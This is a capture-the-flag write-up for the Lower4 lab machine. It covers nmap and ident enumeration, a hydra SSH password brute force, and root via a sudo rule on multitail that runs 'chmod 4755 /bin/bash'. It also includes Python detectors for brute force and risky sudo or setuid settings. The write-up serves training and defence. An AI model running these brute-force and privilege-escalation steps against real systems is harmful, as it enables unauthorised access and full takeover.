Information

Lower4 is a low-difficulty vulnerable Linux virtual machine from the VulNyx platform; it was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-16 09:28 CET
Nmap scan report for 192.168.1.65
Host is up (0.00010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
113/tcp open  ident
 nmap -sVC -p22,80,113 192.168.1.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-16 09:29 CET
Nmap scan report for 192.168.1.65
Host is up (0.00081s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
|_auth-owners: root
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident?
|_auth-owners: lucifer

Shell (lucifer)

80/TCP (HTTP)

Site

Directory Brute Force

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.65 -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.65
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================

113/TCP (IDENT)

User Enumeration

I enumerate the user lucifer through the ident service

 nmap -sC -p113 192.168.1.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-16 09:37 CET
Nmap scan report for 192.168.1.65
Host is up (0.00037s latency).

PORT    STATE SERVICE
113/tcp open  ident
|_auth-owners: lucifer

22/TCP (SSH)

Password Brute Force

With a username in hand, I brute-force with hydra and obtain the password 789456123

 hydra -t 64 -l lucifer -P /opt/techyou.txt ssh://192.168.1.65
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-16 09:39:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking ssh://192.168.1.65:22/
[22][ssh] host: 192.168.1.65   login: lucifer   password: 789456123
1 of 1 target successfully completed, 1 valid password found

I access the system as the user lucifer with the credentials obtained

 ssh lucifer@192.168.1.65
lucifer@192.168.1.65's password: 
lucifer@lower4:~$ id ; hostname
uid=1000(lucifer) gid=1000(lucifer) grupos=1000(lucifer)
lower4
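The hydra run above is exactly the pattern a host's sshd log records: a burst of "Failed password" lines from one source followed by an "Accepted password" for the same user. The detector below is an added example, not part of the original write-up; the SAMPLE_LOG lines are constructed, and the attacking address 192.168.1.10, the process ids and the second and third hosts are assumptions rather than data from the machine. It flags a source that accumulates a threshold of failures inside a sliding window, and separately flags a password login that lands right after such a burst, which is the signal that a guess succeeded.

```python
"""Flag SSH password brute force in sshd log lines.

Added example, not part of the original write-up. SAMPLE_LOG is constructed
auth.log-style data; 192.168.1.10 as the attacking host is an assumption.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Mar 16 09:39:28 lower4 sshd[1201]: Failed password for lucifer from 192.168.1.10 port 40102 ssh2
Mar 16 09:39:28 lower4 sshd[1203]: Failed password for lucifer from 192.168.1.10 port 40104 ssh2
Mar 16 09:39:29 lower4 sshd[1205]: Failed password for lucifer from 192.168.1.10 port 40106 ssh2
Mar 16 09:39:29 lower4 sshd[1207]: Failed password for lucifer from 192.168.1.10 port 40108 ssh2
Mar 16 09:39:30 lower4 sshd[1209]: Failed password for lucifer from 192.168.1.10 port 40110 ssh2
Mar 16 09:39:30 lower4 sshd[1211]: Failed password for lucifer from 192.168.1.10 port 40112 ssh2
Mar 16 09:39:31 lower4 sshd[1213]: Accepted password for lucifer from 192.168.1.10 port 40120 ssh2
Mar 16 09:40:02 lower4 sshd[1230]: Failed password for invalid user admin from 10.0.0.5 port 50000 ssh2
Mar 16 09:45:10 lower4 sshd[1300]: Accepted publickey for backup from 10.0.0.7 port 51000 ssh2
"""

# Traditional syslog format: "Mon DD HH:MM:SS host sshd[pid]: <Result> <method> for [invalid user] <user> from <ip> port <n> ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)


def parse_event(line, year=2025):
    """Parse one sshd line into a dict, or None. Syslog timestamps carry no
    year, so the caller supplies one (2025 matches the write-up's scan date)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "src": m["src"]}


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Return a list of (kind, src, user, ts) findings.

    kind == "bruteforce": src reached `threshold` failures within `window`.
    kind == "bruteforce_success": a password login from src came right after
    such a burst, i.e. one of the guesses worked.
    """
    events = [e for e in map(parse_event, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    failures = defaultdict(list)  # src -> timestamps of recent failures
    flagged = set()
    findings = []
    for e in events:
        src = e["src"]
        # Keep only failures that are still inside the sliding window.
        failures[src] = [t for t in failures[src] if e["ts"] - t <= window]
        if e["result"] == "Failed":
            failures[src].append(e["ts"])
            if len(failures[src]) >= threshold and src not in flagged:
                flagged.add(src)
                findings.append(("bruteforce", src, e["user"], e["ts"]))
        elif e["method"] == "password" and len(failures[src]) >= threshold:
            findings.append(("bruteforce_success", src, e["user"], e["ts"]))
    return findings


if __name__ == "__main__":
    for kind, src, user, ts in detect_bruteforce(SAMPLE_LOG):
        print(f"{ts:%H:%M:%S} {kind:<19} src={src} user={user}")
```

The window is reset per event rather than per fixed bucket, so a slow attacker who spreads attempts over several minutes is only caught by raising the window; the single failure from 10.0.0.5 and the key-based login from 10.0.0.7 are not reported.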

Privilege Escalation

Enumeration

Sudo

The user lucifer can run the multitail binary as root with sudo

lucifer@lower4:~$ sudo -l
Matching Defaults entries for lucifer on lower4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucifer may run the following commands on lower4:
    (root) NOPASSWD: /usr/bin/multitail

Looking through the multitail man page I see an interesting parameter that allows command execution

-l - Command to execute in a window. Parameter is the command.

Abuse

I set permissions 4755 (SUID) on /bin/bash and become the root user

lucifer@lower4:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash
lucifer@lower4:~$ sudo -u root /usr/bin/multitail -l "chmod 4755 /bin/bash"
lucifer@lower4:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash
lucifer@lower4:~$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(lucifer) gid=1000(lucifer) euid=0(root) grupos=1000(lucifer)
lower4
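Two things an administrator can check for on a host like this: a root sudo rule (NOPASSWD or not) for a binary whose documented options run other commands, and the setuid-root shell that the chmod 4755 above leaves behind. The script below is an added example, not part of the original write-up. parse_sudo_l() reads the text that `sudo -l` prints, audit_sudo() flags rules of that class (multitail's -l is the case on this page; the other entries in COMMAND_SPAWNERS are well-known binaries of the same kind, included as assumed examples), and find_suid_shells() picks a setuid-root shell out of `ls -l` output. The sample inputs are constructed to mirror the listings in the text; the /usr/bin/passwd line is a constructed example of a legitimate setuid binary that must not be reported.

```python
"""Audit sudo rules and file modes for the privilege-escalation path in the write-up.

Added example, not part of the original write-up. Sample inputs are constructed;
COMMAND_SPAWNERS beyond multitail is an assumed list of similar binaries.
"""
import os
import re

# Binaries whose documented options run other commands. multitail's -l is the
# one the write-up uses; the rest are assumed examples of the same class.
COMMAND_SPAWNERS = {
    "multitail": "-l runs an arbitrary command in a window",
    "find": "-exec runs an arbitrary command",
    "vim": ":!command runs a shell command",
    "less": "!command runs a shell command",
}
SHELLS = {"bash", "sh", "dash", "zsh"}

SAMPLE_SUDO_L = """\
Matching Defaults entries for lucifer on lower4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User lucifer may run the following commands on lower4:
    (root) NOPASSWD: /usr/bin/multitail
"""

SAMPLE_LS = [
    "-rwxr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash",     # before chmod 4755
    "-rwsr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash",     # after chmod 4755
    "-rwsr-xr-x 1 root root 71912 mar 23  2023 /usr/bin/passwd",  # legitimate setuid, constructed
]

# "(root) NOPASSWD: /usr/bin/multitail" or "(ALL : ALL) ALL"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<rest>\S.*)$")
TAG_RE = re.compile(r"([A-Z]+):\s*")  # NOPASSWD:, SETENV:, NOEXEC:, ...


def parse_sudo_l(text):
    """Turn the command lines of 'sudo -l' into dicts; Defaults lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()  # drop the optional ": group" part
        rest, tags = m["rest"], []
        while (t := TAG_RE.match(rest)):
            tags.append(t.group(1))
            rest = rest[t.end():]
        for cmd in rest.split(", "):
            rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules


def audit_sudo(text):
    """Flag root rules that grant any command or a binary able to spawn one."""
    findings = []
    for rule in parse_sudo_l(text):
        if rule["runas"] not in ("root", "ALL"):
            continue
        cmd = rule["command"]
        if cmd == "ALL":
            findings.append({**rule, "binary": "ALL", "reason": "any command as root"})
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in COMMAND_SPAWNERS:
            findings.append({**rule, "binary": binary, "reason": COMMAND_SPAWNERS[binary]})
    return findings


def find_suid_shells(ls_lines):
    """Return paths of root-owned shells whose owner-execute bit is 's' (setuid)."""
    hits = []
    for line in ls_lines:
        fields = line.split()
        if len(fields) < 9 or not fields[0].startswith("-"):
            continue
        mode, owner, path = fields[0], fields[2], fields[-1]
        if mode[3] in "sS" and owner == "root" and os.path.basename(path) in SHELLS:
            hits.append(path)
    return hits


if __name__ == "__main__":
    for f in audit_sudo(SAMPLE_SUDO_L):
        print(f"sudo: ({f['runas']}) {f['command']} nopasswd={f['nopasswd']}: {f['reason']}")
    for p in find_suid_shells(SAMPLE_LS):
        print(f"setuid root shell: {p}")
```

On a live host the inputs would be the output of `sudo -l` for each user and of `ls -l` over the filesystem (or `find / -perm -4000`); the parser ignores Defaults lines and splits comma-separated command lists, so a rule such as `(root) NOPASSWD: /usr/bin/multitail, /usr/bin/find` yields two findings.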

Flags

Now as the root user I can read the flags user.txt and root.txt

bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
c07d****************************
8e99****************************

That concludes the resolution of the Lower4 machine.

Happy Hacking!